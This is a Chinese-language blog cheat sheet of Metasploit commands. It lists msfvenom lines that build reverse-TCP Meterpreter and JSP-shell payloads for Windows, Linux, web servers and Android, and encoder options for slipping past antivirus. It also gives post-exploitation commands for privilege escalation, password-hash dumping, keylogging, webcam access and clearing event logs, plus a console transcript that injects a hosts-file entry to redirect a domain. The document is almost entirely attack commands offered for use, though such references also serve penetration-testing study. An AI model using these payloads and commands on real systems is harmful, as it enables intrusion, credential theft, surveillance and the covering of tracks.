网络安全:MSF常用命令总结
创始人
2024-04-03 17:10:34

[⊙成功在于你坚持了别人坚持不了的东西⊙]

目录

    • 前言
    • Metasploit常用模块
    • 开启msf命令
    • MSF基础指令
    • MSF中的Payload生成
    • MSF命令参数
    • MSF常用系统命令
    • MSF网络命令
    • 渗透目标主机后使用的命令
    • 对host文件进行注入:

前言

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

Metasploit常用模块

  • exploit(漏洞利用程序模板):包含各种 PoC 验证程序,用于验证利用特定漏洞(exploit)的可行性。
  • payload(有效载荷模板):包含各种恶意程序,用于在目标系统上运行任意命令。它可能是 exploit
    的一部分,也可能是独立编译的应用程序。
  • Auxiliaries(辅助工具模板):包含一系列扫描、嗅探、拨号测试、指纹识别和其他类型的安全评估程序。
  • Encoders(编码工具模板):在渗透测试中,这个模板用来加密有效载荷,以避免被杀毒软件、防火墙、IDS/IPS
    以其他类似的反恶意软件检测出来。
  • NOP(空操作模板):这个模板用于在 shellcode 中插入 NOP(汇编指令)。虽然 NOP 不会进行实际的操作,但是在构造
    shellcode 时可以用来暂时替代 playload,形成完整的 shellcode 程序。

开启msf命令

msfconsole

查看数据库连接状态(一般会自动连接)

db_status

MSF基础指令

help 或者 ? //帮助菜单
exit //退出MSF控制台
back //返回上一级
info //显示一个或者多个模块的信息
show //显示所给类型的模块
background //将当前操作在后台运行
use //使用所选择的模块
set //设置漏洞参数(rhost、rport等)
unset //取消设置漏洞参数
search 漏洞name //查询漏洞工具
use 漏洞ID //使用漏洞工具
show options //查看漏洞工具配置
sessions -i //查看攻击状态

MSF中的Payload生成

1、Windows/Linux

Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名

2、WEB

PHP:
msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp JSP: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jsp WAR: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war

3、Android

Android:
msfvenom -p android/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -o 保存路径/文件名.apk

MSF命令参数

 1 Options:2     -p, --payload           指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定3     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all4     -n, --nopsled            为payload预先指定一个NOP滑动长度5     -f, --format             指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)6     -e, --encoder    [encoder]       指定需要使用的encoder(编码器)7     -a, --arch         指定payload的目标架构8         --platform         指定payload的目标平台9     -s, --space              设定有效攻击荷载的最大长度
10     -b, --bad-chars            设定规避字符集,比如: '\x00\xff'
11     -i, --iterations          指定payload的编码次数
12     -c, --add-code             指定一个附加的win32 shellcode文件
13     -x, --template             指定一个自定义的可执行文件作为模板
14     -k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行
15         --payload-options            列举payload的标准选项
16     -o, --out                  保存payload
17     -v, --var-name             指定一个自定义的变量,以确定输出格式
18         --shellest                   最小化生成payload
19     -h, --help                       查看帮助选项
20         --help-formats               查看msf支持的输出格式列表

MSF常用系统命令

check:检查指定特定目标是否存在安全漏洞,并且能被exploit(攻击模块)利用
sessions    #sessions –h 查看帮助
sessions -i   #进入会话   -k  杀死会话
background  #将当前会话放置后台
run  #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限 
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程    kill  杀死进程
idletime #查看目标机闲置时间
reboot / shutdown   #重启/关机
shell #进入目标机cmd shell

MSF网络命令

ipconfig/ifconfig  #查看IP地址
netstat –ano  #查看端口情况
getproxy   #查看代理信息
route   #查看路由

渗透目标主机后使用的命令

inconfig:列举被渗透主机的网络接口信息
arp    #列举被渗透主机的ARP缓存
shell:获取被渗透主机的cmd shell
getuid:获取当前用户信息
getsystem:提权
getpid:查看Meterepreter会话在被渗透主机内的进程号
ps:列举被渗透主机的所有进程号
sysinfo:列举被渗透主机的信息系统
upload /initrd.img C:\\    :将文件上传到目标系统
rmdir  **.txt    :删除文件
enumdesktops     :桌面命令
screenshot   :截图
webcam_list  :摄像头
获取键盘记录:1. keyscan_start2. keyscan_dumprun hashdump   :获取密码哈希值
clearev   :清除系统日志

对host文件进行注入:

msf6 exploit(windows/local/ms10_015_kitrap0d) > use post/windows/manage/inject_host
msf6 post(windows/manage/inject_host) > optionsModule options (post/windows/manage/inject_host):Name     Current Setting  Required  DescriptionDOMAIN                    yes       Domain name for host file manipulation.IP                        yes       IP address to point domain name to.SESSION                   yes       The session to run this module on.msf6 post(windows/manage/inject_host) > set session 1
session => 1
msf6 post(windows/manage/inject_host) > set ip 192.168.1.113
ip => 192.168.1.113d
msf6 post(windows/manage/inject_host) > set domain www.tianxiu.com
domain => www.tianxiu.com
msf6 post(windows/manage/inject_host) > exploit[*] Inserting hosts file entry pointing www.tianxiu.com to 192.168.1.113..
[+] Done!
[*] Post module execution completed
msf6 post(windows/manage/inject_host) > 

实践案例:
网络安全:kali之MSF工具基本使用方法

如有侵权,请联系删除!

相关内容

热门资讯

部门工作会议上的讲话稿 部门工... 部门工作会议上的讲话稿 、牢固树立责任意识。一个岗位就是一份责任,一份工作就是一份责任。责任...
在县村村通水泥路誓师大会上的讲... 在县村村通水泥路誓师大会上的讲话同志们:  近两来,我们紧紧围绕全县经济和社会跨越式发展这个主题,牢...
学风建设总结发言稿 学风建设总... 学风建设总结发言稿尊敬的各位激:今天下午召开激会,按照市、区教育局的要求布置民主行风评议工作。教育的...
公司单位员工无故旷工检讨书 员...  尊敬的公司领导:  您好,关于我此次的无故旷工,我在此对您表示深深地歉意,主要还是我自我感到很愧疚...
无故旷工检讨书范文 无故旷工检...   尊敬的XX领导:  您好!对于我此次的无故旷工,我在此表示深深地歉意。  XX月XX日,由于XX...